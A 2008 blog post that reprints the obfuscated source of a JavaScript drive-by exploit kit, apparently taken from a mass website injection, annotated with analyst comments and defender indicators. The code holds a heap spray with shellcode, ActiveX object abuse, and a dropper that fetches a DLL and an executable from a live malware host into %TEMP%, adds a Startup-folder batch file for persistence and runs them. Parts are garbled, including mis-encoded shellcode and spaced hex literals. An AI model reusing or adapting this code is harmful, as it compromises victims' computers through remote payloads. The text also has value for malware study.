Javascript Malware Source Code

March 22, 2008 – 12:38 PM

This is how dangerous the web has become. It is estimated that over 10,000 websites recently fell victim to a large attack that injected a reference to a remote JavaScript file into the title tag of each web page. The JS malware exploits vulnerabilities in Windows, RealPlayer, and other applications to break into insecure PCs. The McAfee researchers didn't release the JS malware source, but luckily I'm on Ph4nt0m's feed list and they found its source. What can I say, it's interesting code and heavily obfuscated. I haven't had the time to analyze it yet, because I wanted to share it with all my readers first. It is very important that this knowledge is shared instead of being swept under the rug, and so I place the file here so that we can all learn from it. One notable feature is that the server appears to require a spoofed request header before it will serve the JS malware — another clever way of hiding it. Note for analysts: as the code below shows, a successful run downloads two binaries from the payload host into %TEMP%, writes a startup.bat into the user's Startup folder for persistence, and executes them — handle this sample only in an isolated analysis environment.

Thanks to Ph4nt0m for finding the source.

Source Code (as captured from the URL below — treat that host as live malware and do not fetch it outside a sandbox; note also that the rendering has inserted spaces into some tokens, e.g. `0 x400000` for `0x400000` and `/ g` for `/g`, and the embedded shellcode strings are mis-encoded, so the listing is not directly runnable):

http://b.njnk.net:80/E/J.JS 

// Analyst notes: the sample is preserved byte-for-byte; only comments are added.
// Global state for the exploit kit. Identifiers are obfuscated and every string
// literal is split with "+" to defeat simple signature matching.
//   z1IlbQFl0X  debug switch (0) guarding the two bare blocks below
//   z1IlaxFl0X  "done" flag; every exploit stage returns early when it is set
//   z1IlbiFl0X / z1IlbCFl0X / z1IlbHFl0X / z1IlbIFl0X  per-stage guards checked
//               with "> 0" by x0r1az2Z / z1IlNFl0X / x0r1aG2Z / x0r1aB2Z
//               (nothing in this excerpt increments them — presumably done by
//               the truncated tail of the file)
//   z1IlaoFl0X  payload host; every second-stage URL below is built from it
//   z1IlaAFl0X  browser id compared against "ie" (presumably assigned from
//               x0r1aH2Z(), which returns "ie"/"firefox"/"opera"/"unknown")
//   z1IlapFl0X / z1IlaOFl0X  IE version numbers filled in by x0r1aH2Z()
//   z1IlaSFl0X  set to 1 once the heap spray in z1IltFl0X has been built
// The remaining globals (z1IlbPFl0X, z1IlbfFl0X, z1IlbcFl0X, z1IlbGFl0X,
// z1IlbzFl0X, z1IlaHFl0X, z1IlanFl0X, z1IlaLFl0X, z1IlamFl0X, z1IlcqFl0X) are
// never referenced again in this excerpt.
var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
// Two leftover debug blocks. Both are guarded by z1IlbQFl0X (0), so neither
// runs; z1IlcFFl0X is not defined anywhere in this excerpt.
{
    if(z1IlbQFl0X) {
        document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "";

    }
}

{
    if(z1IlbQFl0X) {
        alert(z1IlcFFl0X);

    }
}

// Reads cookie `name` from document.cookie and returns its unescaped value,
// or null when the cookie is absent. Ordinary cookie-reader boilerplate;
// not called anywhere in this excerpt (presumably used with the marker name
// in z1IlbfFl0X to skip already-visited victims — TODO confirm against the
// truncated tail of the file).
function x0r1aU2Z(name) {
    var z1IlaFFl0X = document.cookie;
    var z1IlaJFl0X = name + "=";
    if(! z1IlaFFl0X) {
        return null;

    }
    // First look for "; name=" (cookie somewhere after the first entry) ...
    var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
    if(z1IlaDFl0X == - 1) {
        // ... then for "name=" at offset 0; a match anywhere else would be a
        // suffix of a longer cookie name and is rejected.
        z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
        if(z1IlaDFl0X != 0) {
            return null;

        }
    }
    else {
        z1IlaDFl0X += 2;   // step over the "; " separator

    }
    // End of value: next ";" or end of the cookie string.
    var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
    if(z1IlbqFl0X == - 1) {
        z1IlbqFl0X = z1IlaFFl0X.length;

    }
    return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));

};

// Writes cookie `name`=`value` (escaped) with an expiry one year from now.
// No path/domain/secure attributes are set. Not called anywhere in this
// excerpt; the natural counterpart of x0r1aU2Z.
function x0r1aR2Z(name, value) {
    var exp = new Date();
    // 365 days in milliseconds (the "* 1" is a leftover multiplier).
    var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
    exp.setTime(z1IlbVFl0X);
    var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
    document.cookie = z1IlbYFl0X;

};

// Heap-spray helper: repeats the seed string z1IlakFl0X until it is at least
// z1IlalFl0X/2 characters long, then truncates it to exactly z1IlalFl0X/2
// characters. z1IlalFl0X is a byte count and each JS character is two bytes,
// hence the "* 2" and "/ 2". Used by z1IltFl0X to build the NOP sled that
// precedes the shellcode in every sprayed block.
// NOTE(analysis): an empty seed would never terminate the loop; the only caller
// passes a non-empty literal.
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
    while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
        z1IlakFl0X += z1IlakFl0X;   // doubling: O(log n) concatenations

    }
    z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
    return z1IlakFl0X;

};

// Heap spray. Called by the memory-corruption stages (x0r1aB2Z, x0r1aG2Z,
// z1IlNFl0X) immediately before they load their exploit page. Runs once:
// z1IlaSFl0X is set to 1 on success and makes later calls return immediately.
//
// What the intact part of the function does (after the garbled region):
//   - block size z1IlaCFl0X = 0x400000 bytes;
//   - sled length = block size - (shellcode bytes + 0x38), the 0x38 presumably
//     being an allowance for the JS string header (not confirmed);
//   - the sled is %u9090 (0x90 NOP) characters expanded by x0r1ax2Z;
//   - (0x0c0c0c0c - 0x400000) / 0x400000 copies of sled+shellcode are kept in
//     the global array z1IlbyFl0X so they are not garbage-collected, so that
//     address 0x0c0c0c0c lands inside a sprayed block.
//
// NOTE(analysis): from the line after `var z1IlbaFl0X = ...` down to the
// `var z1IlaCFl0X = ...` line the capture is garbled — the `unescape("%u...")`
// shellcode literals are mis-encoded, at least one `var ... = unescape("`
// opener is missing, and a stray "*" precedes `var z1IlarFl0X`. Those lines
// are left exactly as captured and have deliberately NOT been reconstructed.
// The listing also renders hex literals with an inserted space ("0 x400000").
function z1IltFl0X() {
    if(z1IlaSFl0X > 0) {
        return;

    }
    try {
        // Target address the spray must cover (0x0c0c0c0c as captured).
        var z1IlbaFl0X = 0 x0c0c0c0c;
        %" + "u" + "ee83%ufe3" + "a%u06" + "4e綍謄菎ᣁ諨%u" + "ffff%u"
+ "83ff%u0" + "c" + "c1Ƹ敮" + "%uc17" + "4ࣸ桐%" + "u6977楮" + "%udc"
+ "8b剑s" + "%u0" + "4" + "55奚%" + "ud08b%u" + "68e8" + "�㏿%" + "u"
+ "50c0偐%u50" + "50嗿褜㑅" + "쀳偐偐嶍區%u75f" + "fT⁕%u458" + "9" + "%u"
+ "eb38㍴%u66c" + "0%u6c" + "b8偬%u7" + "1" + "68%u2e" + "31%" + "u8"
+ "964" + "づ%u" + "c033" + "%" + "ub050%u50" + "82%u02b" + "0㉐僀끐셀"
+ "ᣠp" + "%u30" + "75嗿" + "茈￸%" + "ud3" + "74%" + "u4589㌼%u66c"
+ "0%u0cb" + "8%u2b0" + "1诠" + "%u8df" + "4ў晓Ҹ" + "倁䚍%u50" + "08%u75"
+ "ffX%u24" + "55%u" + "468b%u85" + "04%u" + "74c0㌖%u50" + "c0%u46"
+ "8d倄盿%u8d" + "0" + "4" + "ࡆ" + "p㱵嗿" + "￐㱵" + "%u55f" + "f㌐%uff0"
+ "fふ%u55" + "ff%u8" + "304ી%u" + "ff50ᡕ%" + "uf7eb%" + "uf3e" + "8%u"
+ "ff" + "f" + "e" + "棿瑴㩰⼯⹡%u6" + "a6e%u" + "6b6e渮%u7" + "465%"
+ "u632f%u69" + "67%" + "u622d湩樯%u2" + "f6c%u" + "6c6a%u6" + "16"
+ "f敤" + "%" + "u2e72" + "汰" + "%u6" + "c3f慯晤汩㵥%u2f7" + "1" + "%"
+ "u" + "3171搮汬%u" + "f" + "fff");*var z1IlarFl0X = unescape("%"
+ "ueb55㍮%" + "u64c" + "0䂋蔰%u78c" + "0%u" + "560d%" + "u408b%" + "u"
+ "8b0cᱰ%" + "u8badࡀ%uc3" + "5e䂋" + "茴糀䂋쌼%u8b6" + "0%u2" + "46c"
+ "謤㱅%u7c" + "8b%u" + "78" + "05ﴃ例%u" + "8b18%u" + "20" + "5f�㏣%u8b"
+ "49" + "謴%u" + "f50" + "3쀳%uf" + "c99%" + "u84ac%u74c" + "0섇්퀃"
+ "%" + "uf4eb%u543" + "b⠤%ue27" + "5%u5" + "f" + "8b" + "̤曝ಋ譋ᱟ%udd"
+ "03ҋ%u03" + "8b觅%u" + "2444%u61" + "1" + "c굒%u" + "52" + "50ꧨ"
+ "�%" + "u" + "89" + "ff茇" + "ࣄ잃" + "㬄痱쏬于%" + "uec0" + "e"
+ "%u17a" + "5%u7c" + "0" + "1%u7" + "91f%u" + "97fb࿽ﹲᚳ䦰�" + "䐩埨縏䮋%u5f"
+ "e" + "3%" + "u835e%u7" + "cec" + "%u4ce" + "8%" + "uffff%u8b"
+ "ff%uebd" + "0%ue8" + "0" + "5%uf" + "ff9�%" + "ueb58赦"
+ "䁽肤%uf" + "f7e%u7" + "5ff%u4f" + "f9%u17f" + "6" + "
        var z1IlaCFl0X = 0 x400000;
        var z1IlaWFl0X = z1IlarFl0X.length * 2;
        var z1IlalFl0X = z1IlaCFl0X - (z1IlaWFl0X + 0 x38);
        var z1IlakFl0X = unescape("邐%u9" + "090邐%u9" + "090邐邐%" + "u9090%u9" + "09" + "0");
        z1IlakFl0X = x0r1ax2Z(z1IlakFl0X, z1IlalFl0X);
        z1IlaZFl0X = (z1IlbaFl0X - 0 x400000) / z1IlaCFl0X;
        z1IlbyFl0X = new Array();
        for(i = 0; i < z1IlaZFl0X; i++ ) {
            z1IlbyFl0X[ i] = z1IlakFl0X + z1IlarFl0X;

        }
        z1IlaSFl0X = 1;

    }
    catch(e) {}
};

// Instantiates a COM object named `n` through a host object z1IlavFl0X that is
// expected to expose CreateObject/GetObject (an <object> element built from one
// of the CLSIDs in x0r1az2Z). Six call signatures are tried in turn and the
// first one that yields a truthy object wins; null is returned if all fail.
// Every attempt is wrapped in eval over a spliced string so that neither
// "CreateObject" nor "GetObject" appears contiguously in the script — a
// signature-evasion measure, not a functional necessity. All exceptions are
// swallowed.
function x0r1aW2Z(z1IlavFl0X, n) {
    var z1IlbvFl0X = null;
    // 1. host.CreateObject(n)
    try {
        eval("z1IlbvFl0X = z1IlavFl0X" + ".C" + "reat" + "eObject(n" + ")")
    }
    catch(e) {}
    // 2. host.CreateObject(n, "")
    if(! z1IlbvFl0X) {
        try {
            eval("z1IlbvF" + "l0X = z1Ilav" + "Fl0X." + "Cre" + "ateObject(n, \"\"" + ")")
        }
        catch(e) {}
    }
    // 3. host.CreateObject(n, "", "")
    if(! z1IlbvFl0X) {
        try {
            eval("z1I" + "lbv" + "Fl0X" + " = z1" + "IlavFl0X.CreateObj" + "ect(n, \"\"," + " \"\")")
        }
        catch(e) {}
    }
    // 4. host.GetObject("", n)
    if(! z1IlbvFl0X) {
        try {
            eval("z1IlbvFl" + "0X = " + "z1IlavFl0X.GetObj" + "ect(" + "\"" + "\", n)")
        }
        catch(e) {}
    }
    // 5. host.GetObject(n, "")
    if(! z1IlbvFl0X) {
        try {
            eval("z1Ilbv" + "Fl0X = z" + "1IlavFl0X.G" + "etO" + "bject" + "(n, \"\")")
        }
        catch(e) {}
    }
    // 6. host.GetObject(n)
    if(! z1IlbvFl0X) {
        try {
            eval("z1Ilbv" + "Fl0" + "X = z1Ila" + "v" + "Fl0X.GetObject(n)")
        }
        catch(e) {}
    }
    return(z1IlbvFl0X);

};

// Download-to-disk primitive: fetches `url` synchronously with the XMLHTTP
// object `xml` and writes the raw response body to the path z1IlczFl0X through
// the ADODB.Stream object z1IlavFl0X. No error handling — callers rely on the
// surrounding try/catch.
// Stream constants as used here (per the ADODB.Stream documentation):
//   Type 1 = adTypeBinary, Mode 3 = adModeReadWrite,
//   SaveToFile(..., 2) = adSaveCreateOverWrite (overwrite an existing file).
function x0r1aN2Z(xml, z1IlavFl0X, url, z1IlczFl0X) {
    xml.open("GET", url, false);   // synchronous request
    xml.send(null);
    var z1IlcGFl0X = xml.responseBody;   // binary body (not responseText)
    z1IlavFl0X.Type = 1;
    z1IlavFl0X.Mode = 3;
    z1IlavFl0X.Open();
    z1IlavFl0X.Write(z1IlcGFl0X);
    z1IlavFl0X.SaveToFile(z1IlczFl0X, 2);
    z1IlavFl0X.Close();

};

// Text-file writer: stores the string z1IlbZFl0X at path z1IlcaFl0X via the
// ADODB.Stream object z1IlavFl0X, in text mode (Type 2 = adTypeText) with the
// Windows-1251 (Cyrillic) code page, overwriting any existing file
// (SaveToFile mode 2). Used by z1IlEFl0X to drop the persistence batch file.
// Failures are silently swallowed.
function x0r1bd2Z(z1IlavFl0X, z1IlbZFl0X, z1IlcaFl0X) {
    try {
        z1IlavFl0X.Type = 2;
        z1IlavFl0X.Mode = 3;
        z1IlavFl0X.Charset = "Win" + "dows-" + "1251";
        z1IlavFl0X.Open();
        z1IlavFl0X.WriteText(z1IlbZFl0X);
        z1IlavFl0X.SaveToFile(z1IlcaFl0X, 2);
        z1IlavFl0X.Close();

    }
    catch(z1IlcKFl0X) {}
};

// The dropper. `a` is a host object that can create COM objects (see x0r1aW2Z
// and x0r1az2Z). Using it, the function:
//   1. obtains XMLHTTP (msxml2 or Microsoft.XMLHTTP), ADODB.Stream and
//      WScript.Shell;
//   2. downloads <host>/cgi-bin/jl/jloader.pl?loadfile=q/q1.dll and
//      .../q2l.jpg into %TEMP%\q1.dll and %TEMP%\q2l.exe (the ".jpg" is a
//      disguise — the file is saved and executed as an .exe);
//   3. builds the command line
//        "%TEMP%\q2l.exe" "%TEMP%\q1.dll" "%PROGRAMFILES%\Internet Explorer\iexplore.exe"
//   4. writes that command line into
//        %USERPROFILE%\Start Menu\Programs\Startup\startup.bat
//      (Startup-folder persistence), and
//   5. runs the command line immediately via WScript.Shell.run.
// Returns true if run() did not throw, false otherwise. The downloads and the
// Environment() call are not guarded, so a failure there propagates to the
// caller (x0r1az2Z catches it).
// Indicators for defenders: the two %TEMP% file names, startup.bat in the
// Startup folder, and the jloader.pl request path.
function z1IlEFl0X(a) {
    var z1IlbmFl0X = "/cgi-b" + "in/" + "jl/jload" + "er.pl?load" + "file=q";
    var z1IlaMFl0X = x0r1aW2Z(a, "m" + "sxml2.XM" + "LHTTP");
    if(! z1IlaMFl0X) {
        z1IlaMFl0X = x0r1aW2Z(a, "Microsoft" + ".XMLHTT" + "P");

    }
    var z1IlbbFl0X = x0r1aW2Z(a, "adodb" + ".st" + "ream");
    var s = x0r1aW2Z(a, "WScript" + ".Shel" + "l");
    var e = s.Environment("Proce" + "ss");   // process environment block
    var z1IlckFl0X = "ht" + "tp://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "1.dll";
    var z1IlcgFl0X = "http" + "://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "2l.jpg";
    var z1IlcCFl0X = e.Item("TE" + "MP") + "\\q1.dl" + "l";
    var z1IlclFl0X = e.Item("TEM" + "P") + "\\q2l." + "exe";
    var z1IlcHFl0X = e.Item("PROGRAM" + "FIL" + "ES");
    x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlckFl0X, z1IlcCFl0X);
    x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlcgFl0X, z1IlclFl0X);
    // The literal newline inside this string is a rendering artifact of the
    // capture; kept as captured.
    var z1IlbLFl0X = "\"" + z1IlclFl0X + "\"" + " \"" + z1IlcCFl0X + "\"" + "
\"" + z1IlcHFl0X + "\\I" + "nternet Exp" + "lorer\\ie" + "xp" + "lore.exe\"";
    x0r1bd2Z(z1IlbbFl0X, "@ech" + "o" + " off\n" + z1IlbLFl0X + "\n",
 e.Item("USERP" + "RO" + "FILE") + "\\Start M" + "enu\\Pr" + "og" +
"rams\\Startup\\sta" + "rtu" + "p.bat");
    try {
        s.run(z1IlbLFl0X);
        return true;

    }
    catch(e) {}
    return false;

};

// Browser fingerprint from navigator.userAgent. Returns "ie", "firefox",
// "opera" or "unknown". The IE test explicitly excludes UAs that also mention
// Opera or Firefox (those can contain "MSIE" too) and requires "Windows". For
// IE it additionally fills the globals z1IlaOFl0X (full IE component version,
// x0r1aQ2Z) and z1IlapFl0X (major*100+minor, x0r1aI2Z) that the exploit
// selectors compare against.
function x0r1aH2Z() {
    if(navigator.userAgent.indexOf("Oper" + "a") == - 1 && navigator.userAgent.indexOf("Firefo" + "x") == - 1 && navigator.userAgent.indexOf("M" + "SIE") != - 1 && navigator.userAgent.indexOf("W" + "indows") != - 1) {
        z1IlaOFl0X = x0r1aQ2Z();
        z1IlapFl0X = x0r1aI2Z();
        return "ie";

    }
    if(navigator.userAgent.indexOf("Firefo" + "x") != - 1) {
        return "firefo" + "x";

    }
    if(navigator.userAgent.indexOf("O" + "pera") != - 1) {
        return "oper" + "a";

    }
    return "unkno" + "wn";

};

// Appends a DIV carrying IE's "#default#clientCaps" DHTML behavior to the
// body and leaves it in the implicit global z1IlatFl0X. That behavior exposes
// getComponentVersion(), which x0r1aQ2Z / x0r1aI2Z use to read the installed
// IE version. IE-only; on other browsers addBehavior throws (callers catch).
function x0r1an2Z() {
    z1IlatFl0X = document.createElement("DIV");
    z1IlatFl0X.id = "z1I" + "latF" + "l0X";
    z1IlatFl0X.addBehavior("#" + "default#cli" + "entCaps");
    document.body.appendChild(z1IlatFl0X);

};

// QuickTime version probe. Returns 0 when QuickTime is not detected, otherwise
// a packed number: (major << 8) + (minor << 4) + patch on non-IE browsers
// (parsed from the plugin name), or the high 16 bits of the
// QuickTimeCheck control's version on IE < 7, or the constant 0x100 on IE >= 7.
// NOTE(analysis): on the IE < 7 path the property read `qt_check.z1IlblFl0X`
// looks like a real property name that the obfuscator renamed by mistake; if
// so it is undefined, the `& 0xffff0000` yields 0 and version stays 0 — i.e.
// this branch is probably broken in the wild sample (not confirmed).
// The listing renders `0xffff0000`, `0x100` and the `/g` regex flag with
// inserted spaces.
function z1IlIFl0X() {
    var version = 0, qt_control;
    if(z1IlaAFl0X == "ie") {
        // Presence check: instantiating the control throws if not installed.
        try {
            qt_control = new ActiveXObject('QuickTime.QuickTime');

        }
        catch(e) {
            return 0;

        }
        delete qt_control;
        if(z1IlapFl0X < 700) {
            try {
                var qt_check = new ActiveXObject('QuickTimeCheckObject.QuickTimeCheck');
                version = (qt_check.z1IlblFl0X & 0 xffff0000) >> 16;
                delete qt_check;

            }
            catch(e) {}
        }
        else {
            version = 0 x100;

        }
    }
    else {
        // Non-IE: scan navigator.plugins for a name containing "QuickTime"
        // (last match wins) and parse "a.b[.c]" out of it.
        if(navigator.plugins != null && navigator.plugins.length > 0) {
            var plugin_str = null;
            for(var i = 0; i < navigator.plugins.length; i++ ) {
                var z1IlaPFl0X = navigator.plugins[ i];
                if(z1IlaPFl0X.name.indexOf("QuickTim" + "e") > - 1) {
                    plugin_str = z1IlaPFl0X.name;

                }
            }
            // If no plugin matched, plugin_str is null and exec() returns
            // null, so the [ 0] access below throws (no guard).
            var z1IlcDFl0X = /[\d.]+/ g;
            var z1IlceFl0X = z1IlcDFl0X.exec(plugin_str);
            var z1IlaFl0X = z1IlceFl0X[ 0] .split(".");
            version = (parseInt(z1IlaFl0X[ 0] ) << 8) + (parseInt(z1IlaFl0X[ 1] ) << 4);
            if(z1IlaFl0X.length > 2) {
                version += parseInt(z1IlaFl0X[ 2] );

            }
        }
    }
    return version;

};

// Full IE version via the clientCaps behavior: getComponentVersion() on the
// component GUID {89820200-ECBD-11CF-8B85-00AA005B4383} returns "a,b,c,d",
// which is packed as a*10^10 + b*10^8 + c*10^4 + d into the implicit global
// z1IlbsFl0X. Returns 0 if anything throws (non-IE, behavior unavailable).
// The local z1IlaBFl0X is declared but never used.
function x0r1aQ2Z() {
    var z1IlbdFl0X, z1IlaRFl0X;
    var z1IlaBFl0X;
    try {
        x0r1an2Z();
        z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{89820" + "200-" +
"ECBD-11CF" + "-8" + "B85-00AA005B4383}", "compo" + "nent" + "id");
        z1IlbdFl0X = z1IlaRFl0X.split(",");
        z1IlbsFl0X = parseInt(z1IlbdFl0X[ 0] ) * 10000000000 +
parseInt(z1IlbdFl0X[ 1] ) * 100000000 + parseInt(z1IlbdFl0X[ 2] ) * 10000 + parseInt(z1IlbdFl0X[ 3] );

    }
    catch(e) {
        z1IlbsFl0X = 0;

    }
    return z1IlbsFl0X;

};

// IE major/minor as major*100 + minor (e.g. 6.0 -> 600, 7.0 -> 700; compared
// against 700 in z1IlIFl0X). Primary source is the same clientCaps component
// version as x0r1aQ2Z (reusing the DIV if x0r1an2Z already ran); if that
// throws, falls back to parsing "MSIE a.b" out of the User-Agent. Returns 0
// when neither works.
function x0r1aI2Z() {
    var z1IlbdFl0X, z1IlaRFl0X;
    var z1IlaBFl0X = 0;
    try {
        if(! z1IlatFl0X) {
            x0r1an2Z();

        }
        z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{898202" + "00-ECBD-11CF-8B85-00" + "AA" + "005B4383" + "}", "c" + "ompon" + "entid");
        z1IlbdFl0X = z1IlaRFl0X.split(",");
        z1IlaBFl0X = parseInt(z1IlbdFl0X[ 0] ) * 100 + parseInt(z1IlbdFl0X[ 1] );

    }
    catch(e) {
        // Fallback: User-Agent "MSIE a.b".
        var z1IlcDFl0X = /MSIE\s+(\d+)\.(\d+)/;
        var z1IlbjFl0X = new Array;
        if(z1IlbjFl0X = z1IlcDFl0X.exec(navigator.userAgent)) {
            z1IlaBFl0X = parseInt(z1IlbjFl0X[ 1] ) * 100 + parseInt(z1IlbjFl0X[ 2] );

        }
    }
    return z1IlaBFl0X;

};

// Firefox version from the User-Agent ("Firefox/a.b[.c[.d]]"), packed as
// a*10^6 + b*10^4 + c*10^2 + d (e.g. "1.5.0.4" -> 1050004). Returns 0 when the
// UA does not match. Not called anywhere in this excerpt; presumably used by
// the truncated tail to choose between the ff104/ff154 pages.
function x0r1aD2Z() {
    var z1IlasFl0X, z1IlbdFl0X;
    var z1IlbrFl0X = "", z1IlaBFl0X = 0;
    z1IlbXFl0X = /\sFirefox\/([\d\.]+)\b/;   // implicit global regex
    z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
    if(! z1IlasFl0X) {
        return 0;

    }
    z1IlbdFl0X = z1IlasFl0X[ 1] .split(".");
    z1IlaBFl0X = (parseInt(z1IlbdFl0X[ 0] ) * 1000000) + (parseInt(z1IlbdFl0X[ 1] ) * 10000);
    if(z1IlbdFl0X.length > 2) {
        z1IlaBFl0X += parseInt(z1IlbdFl0X[ 2] ) * 100;

    }
    if(z1IlbdFl0X.length > 3) {
        z1IlaBFl0X += parseInt(z1IlbdFl0X[ 3] );

    }
    return z1IlaBFl0X;

};

// Windows version from the User-Agent: "Windows NT a.b" -> a*10 + b
// (e.g. "Windows NT 5.1" -> 51), "Windows 98" -> 48, anything else -> 0.
// Not called anywhere in this excerpt.
function x0r1aJ2Z() {
    var z1IlasFl0X;
    var z1IlbnFl0X = 0;
    z1IlbXFl0X = /Windows\sNT\s(\d)\.(\d)/;   // implicit global, single-digit parts only
    z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
    if(! z1IlasFl0X) {
        z1IlbXFl0X = /Windows\s98/;
        z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
        if(z1IlasFl0X) {
            z1IlbnFl0X = 48;
            return z1IlbnFl0X;

        }
        return 0;

    }
    z1IlbnFl0X = parseInt(z1IlasFl0X[ 1] ) * 10 + parseInt(z1IlasFl0X[ 2] );
    return z1IlbnFl0X;

};

// Points the element with id "z1IlbeFl0X" at URL z1IlbOFl0X by setting .src.
// That element is not created in this excerpt — presumably a <script> tag in
// the hosting page, since the only caller (x0r1av2Z) passes a .js URL. Throws
// if the element is missing. Always returns true.
function x0r1aE2Z(z1IlbOFl0X) {
    var z1IlcIFl0X = document.getElementById("z1" + "IlbeFl" + "0X");
    z1IlcIFl0X.src = z1IlbOFl0X;
    return true;

};

// Navigates the iframe with id "z1IlaEFl0X" to URL z1IlbRFl0X. This is the
// delivery channel for the .htm exploit pages (ff104, ff154, vml, ani5). The
// iframe is not created in this excerpt (presumably in the hosting page);
// throws if absent. Always returns true.
function x0r1au2Z(z1IlbRFl0X) {
    var iframe = document.getElementById("z1Il" + "aE" + "Fl0X");
    iframe.src = z1IlbRFl0X;
    return true;

};

// Stage loader: injects http://<host>/E/isci/isci_my.js via the script element
// (x0r1aE2Z) unless the "done" flag z1IlaxFl0X is already set. What that
// script targets cannot be determined from this excerpt. Returns true only on
// the early-exit path; otherwise undefined.
function x0r1av2Z() {
    if(z1IlaxFl0X) {
        return true;

    }
    x0r1aE2Z("http" + "://" + z1IlaoFl0X + "/E/isci/isc" + "i_my" + ".js");

};

// Stage loader: navigates the exploit iframe to http://<host>/E/ff104/ff104.htm
// unless z1IlaxFl0X is set. The path name suggests a Firefox 1.0.4-era target
// (inference from the name only). Returns true only on the early-exit path.
function x0r1aT2Z() {
    if(z1IlaxFl0X) {
        return true;

    }
    x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff1" + "04/" + "ff104.htm");

};

// Stage loader: navigates the exploit iframe to http://<host>/E/ff154/ff154.htm
// unless z1IlaxFl0X is set. The path name suggests a Firefox 1.5.x-era target
// (inference from the name only). Returns true only on the early-exit path.
function x0r1aS2Z() {
    if(z1IlaxFl0X) {
        return true;

    }
    x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff15" + "4/ff154" + ".htm");

};

// Memory-corruption stage: builds the heap spray (z1IltFl0X) and then loads
// http://<host>/E/vml/vml.htm in the exploit iframe. Skipped when its guard
// counter z1IlbIFl0X is > 0 (returns false) or the "done" flag z1IlaxFl0X is
// set (returns true). The "vml" name suggests a VML-related IE bug; the
// actual exploit is in the remote page and is not visible here.
function x0r1aB2Z() {
    if(z1IlbIFl0X > 0) {
        return false;

    }
    if(z1IlaxFl0X) {
        return true;

    }
    z1IltFl0X();
    x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/vm" + "l/vml" + ".htm");

};

// Memory-corruption stage: builds the heap spray (z1IltFl0X) and then loads
// http://<host>/E/ani/ani5.htm in the exploit iframe. Skipped when its guard
// counter z1IlbHFl0X is > 0 (returns false) or the "done" flag z1IlaxFl0X is
// set (returns true). The "ani" name suggests an animated-cursor (.ani)
// bug; the actual exploit is in the remote page and is not visible here.
function x0r1aG2Z() {
    if(z1IlbHFl0X > 0) {
        return false;

    }
    if(z1IlaxFl0X) {
        return true;

    }
    z1IltFl0X();
    x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E" + "/" + "ani/ani5.htm");

};

// ActiveX "CreateObject" stage. Walks a null-terminated list of CLSIDs,
// creates an <object classid="clsid:..."> for each (braces stripped by the
// substring call), and probes it with x0r1aW2Z(obj, "Shell.Application").
// The first object through which that succeeds is handed to the dropper
// z1IlEFl0X, which uses it to create XMLHTTP / ADODB.Stream / WScript.Shell
// and install the payload; the dropper's result is returned. Returns false if
// its guard counter z1IlbiFl0X is > 0 or no CLSID works, true (early exit) if
// z1IlaxFl0X is set.
// NOTE(analysis): the objects are created but never appended to the DOM;
// whether that instantiates the control depends on the browser. Several of
// these CLSIDs are the ones commonly reported in 2006-2008 drive-by kits for
// ActiveX controls that expose CreateObject to script (e.g. the first and
// last entries, which differ only in the final octet) — verify each against a
// CLSID database before attributing a specific vulnerability.
// Defender indicator: kill-bit / block these CLSIDs in IE.
function x0r1az2Z() {
    var z1IlbEFl0X = 0;
    var z1IlctFl0X = false;
    if(z1IlbiFl0X > 0) {
        return false;

    }
    if(z1IlaxFl0X) {
        return true;

    }
    var z1IlbpFl0X = new Array("{BD" + "9" + "6" +
 "C556-65A3-11D0-983A-00C04FC2" + "9E30}", "{A" + "B9BCEDD-EC" +
"7E-47E1-9322-D4A210617" + "116" + "}", "{00" + "06F033-" + "0000-0000-C0" +
"00" + "-000000000046}", "{0006F03A-" + "00" + "00-000" + "0-C000-000" +
"000000046}", "{6" + "e" + "32070a-766d-4" + "ee6-879c-dc1fa" + "91d2fc3}",
 "{6414512B-B978-" + "45" + "1D-A0D8-FCF" + "DF33E" + "833C}", "{7F5B7F63-F0" +
 "6F-4" + "33" + "1-8A26-" + "339E03C0AE3D}", "{06723E09-F4" + "C2-" +
"43c8-8358-09FCD1" + "DB" + "0766}", "{639F725F-1" + "B2D-4831-A9" + "FD-874" +
 "84768" + "2010}", "{BA" + "0185" + "99-1" + "DB3-44f9-83" + "B4-461454C84BF8}", "{D0C07D56-7C69-43" + "F1" + "-B4A0-25F5A11F" + "AB1" +
"9}", "{E8CCCDDF-CA2" + "8-" + "496" + "b-B050-" + "6C07C962476B}", "{BD96C5" +
"56-6" + "5A3-11D" + "0-9" + "83A-00C04FC29E36}", null);
